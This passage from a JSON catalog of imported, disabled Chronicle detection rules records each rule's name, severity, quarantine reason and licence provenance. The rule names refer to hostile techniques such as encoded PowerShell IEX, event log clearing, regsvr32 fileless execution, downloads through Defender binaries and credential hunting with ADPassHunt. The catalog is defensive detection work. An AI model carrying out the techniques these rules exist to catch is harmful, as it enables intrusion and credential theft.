"encoded_frombase64string", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/encoded-frombase64string.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "encoded_frombase64string", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/encoded_frombase64string.yaral" } }, { "id": "chronicle-detection-rules-encoded-iex", "type": "detection", "name": "encoded_iex", "description": "encoded_iex", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/encoded-iex.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "encoded_iex", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/encoded_iex.yaral" } }, { "id": "chronicle-detection-rules-entra-id-admin-login-activity-to-uncommon-mscloud-apps", "type": "detection", "name": "entra_id_admin_login_activity_to_uncommon_mscloud_apps", "description": "entra_id_admin_login_activity_to_uncommon_mscloud_apps", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-admin-login-activity-to-uncommon-mscloud-apps.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_admin_login_activity_to_uncommon_mscloud_apps", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_admin_login_activity_to_uncommon_mscloud_apps.yaral" } }, { "id": "chronicle-detection-rules-entra-id-application-deletion", "type": "detection", "name": "entra_id_application_deletion", "description": "entra_id_application_deletion", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-application-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_application_deletion", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_application_deletion.yaral" } }, { "id": "chronicle-detection-rules-entra-id-application-hard-deletion", 
"type": "detection", "name": "entra_id_application_hard_deletion", "description": "entra_id_application_hard_deletion", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-application-hard-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_application_hard_deletion", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_application_hard_deletion.yaral" } }, { "id": "chronicle-detection-rules-entra-id-application-restore", "type": "detection", "name": "entra_id_application_restore", "description": "entra_id_application_restore", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-application-restore.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_application_restore", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_application_restore.yaral" } }, { "id": 
"chronicle-detection-rules-entra-id-conditional-access-policy-modification", "type": "detection", "name": "entra_id_conditional_access_policy_modification", "description": "entra_id_conditional_access_policy_modification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-conditional-access-policy-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_conditional_access_policy_modification", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_conditional_access_policy_modification.yaral" } }, { "id": "chronicle-detection-rules-entra-id-devicecode-phishing-attack", "type": "detection", "name": "entra_id_devicecode_phishing_attack", "description": "entra_id_devicecode_phishing_attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-devicecode-phishing-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_devicecode_phishing_attack", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_devicecode_phishing_attack.yaral" } }, { "id": "chronicle-detection-rules-entra-id-expired-refresh-token-use", "type": "detection", "name": "entra_id_expired_refresh_token_use", "description": "entra_id_expired_refresh_token_use", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-expired-refresh-token-use.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_expired_refresh_token_use", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_expired_refresh_token_use.yaral" } }, { "id": "chronicle-detection-rules-entra-id-group-deletion-success", "type": "detection", "name": "entra_id_group_deletion_success", "description": "entra_id_group_deletion_success", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-group-deletion-success.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": 
"entra_id_group_deletion_success", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_group_deletion_success.yaral" } }, { "id": "chronicle-detection-rules-entra-id-login-activity-to-azure-ad-powershell-app", "type": "detection", "name": "entra_id_login_activity_to_azure_ad_powershell_app", "description": "entra_id_login_activity_to_azure_ad_powershell_app", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-login-activity-to-azure-ad-powershell-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_login_activity_to_azure_ad_powershell_app", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_login_activity_to_azure_ad_powershell_app.yaral" } }, { "id": "chronicle-detection-rules-entra-id-login-activity-to-uncommon-mscloud-apps", "type": "detection", "name": "entra_id_login_activity_to_uncommon_mscloud_apps", "description": "entra_id_login_activity_to_uncommon_mscloud_apps", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/entra-id-login-activity-to-uncommon-mscloud-apps.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_login_activity_to_uncommon_mscloud_apps", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_login_activity_to_uncommon_mscloud_apps.yaral" } }, { "id": "chronicle-detection-rules-entra-id-recently-created-user-assigned-entra-id-roles", "type": "detection", "name": "entra_id_recently_created_user_assigned_entra_id_roles", "description": "entra_id_recently_created_user_assigned_entra_id_roles", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-recently-created-user-assigned-entra-id-roles.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_recently_created_user_assigned_entra_id_roles", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_recently_created_user_assigned_azuread_roles.yaral" } }, { "id": "chronicle-detection-rules-evasion-base64-decode-arguments-in-powershell-possible-apt29-activity", "type": "detection", "name": "evasion_base64_decode_arguments_in_powershell_possible_apt29_activity", "description": 
"evasion_base64_decode_arguments_in_powershell_possible_apt29_activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/evasion-base64-decode-arguments-in-powershell-possible-apt29-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "evasion_base64_decode_arguments_in_powershell_possible_apt29_activity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/evasion_base64_decode_arguments_in_powershell___possible_apt29_activity.yaral" } }, { "id": "chronicle-detection-rules-eventlog-cleared", "type": "detection", "name": "eventlog_cleared", "description": "eventlog_cleared", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/eventlog-cleared.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "eventlog_cleared", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/eventlog_cleared.yaral" } }, { "id": "chronicle-detection-rules-executables-started-in-suspicious-folder", "type": "detection", "name": "executables_started_in_suspicious_folder", "description": "executables_started_in_suspicious_folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/executables-started-in-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "executables_started_in_suspicious_folder", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/executables_started_in_suspicious_folder.yaral" } }, { "id": "chronicle-detection-rules-execution-in-nonexecutable-folder", "type": "detection", "name": "execution_in_nonexecutable_folder", "description": "execution_in_nonexecutable_folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/execution-in-nonexecutable-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "execution_in_nonexecutable_folder", 
"source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/execution_in_non_executable_folder.yaral" } }, { "id": "chronicle-detection-rules-execution-in-outlook-temp-folder", "type": "detection", "name": "execution_in_outlook_temp_folder", "description": "execution_in_outlook_temp_folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/execution-in-outlook-temp-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "execution_in_outlook_temp_folder", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/execution_in_outlook_temp_folder.yaral" } }, { "id": "chronicle-detection-rules-existing-service-modified-detector-sysmon-behavior", "type": "detection", "name": "existing_service_modified_detector_sysmon_behavior", "description": "existing_service_modified_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/existing-service-modified-detector-sysmon-behavior.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "existing_service_modified_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/existing_service_modified_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-exploit-for-cve20151641", "type": "detection", "name": "exploit_for_cve20151641", "description": "exploit_for_cve20151641", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/exploit-for-cve20151641.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "exploit_for_cve20151641", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/process_creation/exploit_for_cve_2015_1641.yaral" } }, { "id": "chronicle-detection-rules-exploit-framework-user-agent", "type": "detection", "name": "exploit_framework_user_agent", "description": "exploit_framework_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", 
"enabled": false, "path": "detections/chronicle-imports/_quarantine/exploit-framework-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "exploit_framework_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/exploit_framework_user_agent.yaral" } }, { "id": "chronicle-detection-rules-exploited-cve202010189-zoho-manageengine", "type": "detection", "name": "exploited_cve202010189_zoho_manageengine", "description": "exploited_cve202010189_zoho_manageengine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/exploited-cve202010189-zoho-manageengine.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "exploited_cve202010189_zoho_manageengine", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/exploited_cve_2020_10189_zoho_manageengine.yaral" } }, { "id": "chronicle-detection-rules-fake-zoom-installerexe-devil-shadow-botnet", "type": "detection", "name": "fake_zoom_installerexe_devil_shadow_botnet", "description": "fake_zoom_installerexe_devil_shadow_botnet", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fake-zoom-installerexe-devil-shadow-botnet.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fake_zoom_installerexe_devil_shadow_botnet", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/fake_zoom_installer_exe__devil_shadow_botnet.yaral" } }, { "id": "chronicle-detection-rules-fallout-rig-ek-delivers-raccoon-stealer", "type": "detection", "name": "fallout_rig_ek_delivers_raccoon_stealer", "description": "fallout_rig_ek_delivers_raccoon_stealer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fallout-rig-ek-delivers-raccoon-stealer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fallout_rig_ek_delivers_raccoon_stealer", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/fallout_rig_ek_delivers_raccoon_stealer.yaral" } }, { "id": "chronicle-detection-rules-file-creation-time-changed-via-powershell", "type": 
"detection", "name": "file_creation_time_changed_via_powershell", "description": "file_creation_time_changed_via_powershell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/file-creation-time-changed-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "file_creation_time_changed_via_powershell", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/file_creation_time_changed_via_powershell.yaral" } }, { "id": "chronicle-detection-rules-file-deletion-via-cmd-via-cmdline", "type": "detection", "name": "file_deletion_via_cmd_via_cmdline", "description": "file_deletion_via_cmd_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/file-deletion-via-cmd-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "file_deletion_via_cmd_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/file_deletion_via_cmd__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-file-download-using-notepad-plus-plus-gup-utility", "type": "detection", "name": "file_download_using_notepad_plus_plus_gup_utility", "description": "file_download_using_notepad_plus_plus_gup_utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/file-download-using-notepad-plus-plus-gup-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "file_download_using_notepad_plus_plus_gup_utility", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/file_download_using_notepad_plus_plus_gup_utility.yaral" } }, { "id": "chronicle-detection-rules-file-download-via-windows-defender-mpcmdrun-exe", "type": "detection", "name": "file_download_via_windows_defender_mpcmdrun_exe", "description": "file_download_via_windows_defender_mpcmdrun_exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/file-download-via-windows-defender-mpcmdrun-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 
"source": "chronicle/detection-rules", "source_id": "file_download_via_windows_defender_mpcmdrun_exe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/file_download_via_windows_defender_mpcmdrun_exe.yaral" } }, { "id": "chronicle-detection-rules-fileless-attack-via-regsvr32exe", "type": "detection", "name": "fileless_attack_via_regsvr32exe", "description": "fileless_attack_via_regsvr32exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fileless-attack-via-regsvr32exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fileless_attack_via_regsvr32exe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/fileless_attack_via_regsvr32_exe.yaral" } }, { "id": "chronicle-detection-rules-finger-exe-execution", "type": "detection", "name": "finger_exe_execution", "description": "finger_exe_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/finger-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query 
language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "finger_exe_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/finger_exe_execution.yaral" } }, { "id": "chronicle-detection-rules-fireeye-red-team-tool-adpasshunt-via-cmdline", "type": "detection", "name": "fireeye_red_team_tool__adpasshunt_via_cmdline", "description": "fireeye_red_team_tool__adpasshunt_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fireeye-red-team-tool-adpasshunt-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fireeye_red_team_tool__adpasshunt_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/fireeye_red_team_tool___adpasshunt__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-fireeye-red-team-tool-execavatorexe-via-cmdline", "type": "detection", "name": "fireeye_red_team_tool__execavatorexe_via_cmdline", "description": "fireeye_red_team_tool__execavatorexe_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": 
"chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fireeye-red-team-tool-execavatorexe-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fireeye_red_team_tool__execavatorexe_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/fireeye_red_team_tool___execavator_exe__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-fireeye-red-team-tool-execavatorexe-via-registry", "type": "detection", "name": "fireeye_red_team_tool__execavatorexe_via_registry", "description": "fireeye_red_team_tool__execavatorexe_via_registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fireeye-red-team-tool-execavatorexe-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fireeye_red_team_tool__execavatorexe_via_registry", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/registry_event/fireeye_red_team_tool___execavator_exe__via_registry.yaral" } }, { "id": 